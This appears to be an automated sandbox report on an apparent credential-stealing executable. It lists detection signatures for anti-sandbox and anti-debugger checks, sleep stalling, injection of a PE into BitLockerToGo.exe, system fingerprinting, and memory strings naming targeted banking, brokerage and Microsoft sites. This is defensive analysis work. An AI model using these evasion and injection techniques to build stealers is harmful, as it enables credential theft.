Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Found stalling execution ending in API Sleep call
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Stalling execution: Execution stalls by calling Sleep
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos, 3_2_02E5DB00
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Window / User API: threadDelayed 451 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Window / User API: threadDelayed 533 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Window / User API: threadDelayed 8293 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found evasive API chain (date check)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5728 Thread sleep time: -30101s >= -30000s Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6448 Thread sleep time: -699000s >= -30000s Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5728 Thread sleep time: -455961s >= -30000s Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6448 Thread sleep time: -1599000s >= -30000s Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5728 Thread sleep time: -8384223s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2832 Thread sleep count: 9995 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2832 Thread sleep time: -2248875s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F449B0 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 02F449F1h 3_2_02F449B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02EC6000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE6770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 3_2_02EE6770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E31F9C FindClose,FindFirstFileExW,GetLastError, 3_2_02E31F9C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E93F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA, 3_2_02E93F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E32022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_02E32022
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02E938D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EDFF00 CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError, 3_2_02EDFF00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E4FC2F FindFirstFileExW, 3_2_02E4FC2F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Thread delayed: delay time: 30101 Jump to behavior
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.00000000074C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Ven_VMware&P
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: discord.comVMware20,11696487552f
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r global passwords blocklistVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4564079502.00000000074D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}iG8
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: global block list test formVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BitLockerToGo.exe, 00000003.00000003.2268651425.000000000317E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.00000000074C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+`_
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageformVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rootpagecomVMware20,11696487552o
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: BitLockerToGo.exe, 00000003.00000002.4564844029.000000000754A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}r
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000003.00000002.4564844029.000000000754A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}dowsApp
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2325297122.00000000074E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZX
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169648755
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9135C559
Source: BitLockerToGo.exe, 00000003.00000003.3323528014.000000000751F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}S
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9135C559V
Source: BitLockerToGo.exe, 00000003.00000003.2268651425.0000000003176000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696p
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!
Source: file.exe, 00000000.00000002.2266690405.000001913B593000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comVMware20,11696487552o
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o.inVMware20,11696487552~
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ccount.microsoft.com/profileVMware20,11696487552u
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED6280 IsDebuggerPresent, 3_2_02ED6280
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A102 CreateThread,FindCloseChangeNotification,Sleep,GetTempPathA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,OutputDebugStringA,CreateMutexA,GetLastError,Sleep,Sleep,Sleep,Sleep,shutdown,closesocket,Sleep, 3_2_02E5A102
Contains functionality to dynamically determine API calls
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 3_2_02ECF280
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00045CF00 mov eax, dword ptr fs:[00000030h] 0_2_000000C00045CF00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00045CF00 mov eax, dword ptr fs:[00000030h] 0_2_000000C00045CF00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000492F60 mov eax, dword ptr fs:[00000030h] 0_2_000000C000492F60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004C6180 mov eax, dword ptr fs:[00000030h] 0_2_000000C0004C6180
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A102 mov eax, dword ptr fs:[00000030h] 3_2_02E5A102
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A102 mov ecx, dword ptr fs:[00000030h] 3_2_02E5A102
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC86C0 mov eax, dword ptr fs:[00000030h] 3_2_02EC86C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A6B7 mov eax, dword ptr fs:[00000030h] 3_2_02E5A6B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A6B7 mov eax, dword ptr fs:[00000030h] 3_2_02E5A6B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A6B7 mov eax, dword ptr fs:[00000030h] 3_2_02E5A6B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3070 mov ecx, dword ptr fs:[00000030h] 3_2_02ED3070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E95790 mov eax, dword ptr fs:[00000030h] 3_2_02E95790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E595B8 mov eax, dword ptr fs:[00000030h] 3_2_02E595B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E595B8 mov eax, dword ptr fs:[00000030h] 3_2_02E595B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E595B8 mov eax, dword ptr fs:[00000030h] 3_2_02E595B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E595B8 mov ecx, dword ptr fs:[00000030h] 3_2_02E595B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5DB00 mov eax, dword ptr fs:[00000030h] 3_2_02E5DB00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5DB00 mov eax, dword ptr fs:[00000030h] 3_2_02E5DB00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED6280 mov eax, dword ptr fs:[00000030h] 3_2_02ED6280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECA6B3 mov eax, dword ptr fs:[00000030h] 3_2_02ECA6B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECA502 mov eax, dword ptr fs:[00000030h] 3_2_02ECA502
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC8E09 mov eax, dword ptr fs:[00000030h] 3_2_02EC8E09
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC8C58 mov eax, dword ptr fs:[00000030h] 3_2_02EC8C58
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6D80 mov eax, dword ptr fs:[00000030h] 3_2_02EC6D80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC9213 mov eax, dword ptr fs:[00000030h] 3_2_02EC9213
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC93CB mov eax, dword ptr fs:[00000030h] 3_2_02EC93CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECB30F mov eax, dword ptr fs:[00000030h] 3_2_02ECB30F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECB15E mov eax, dword ptr fs:[00000030h] 3_2_02ECB15E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC9B4B mov eax, dword ptr fs:[00000030h] 3_2_02EC9B4B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC9CFC mov eax, dword ptr fs:[00000030h] 3_2_02EC9CFC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEEA40 CharNextA,CharNextA,CharNextA,CharNextA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrlenA,GetProcessHeap,GetProcessHeap,HeapAlloc,lstrcpynA,GetProcessHeap,HeapFree, 3_2_02EEEA40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E34311 SetUnhandledExceptionFilter, 3_2_02E34311
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E34184 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_02E34184
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E3451D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_02E3451D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E38A64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_02E38A64

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E00000 protect: page execute and read and write Jump to behavior
Contains functionality to inject threads in other processes
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 3_2_02ECF280
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E00000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E00000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2D3B008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe "C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000433185 cpuid 0_2_000000C000433185
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 3_2_02E52B5A
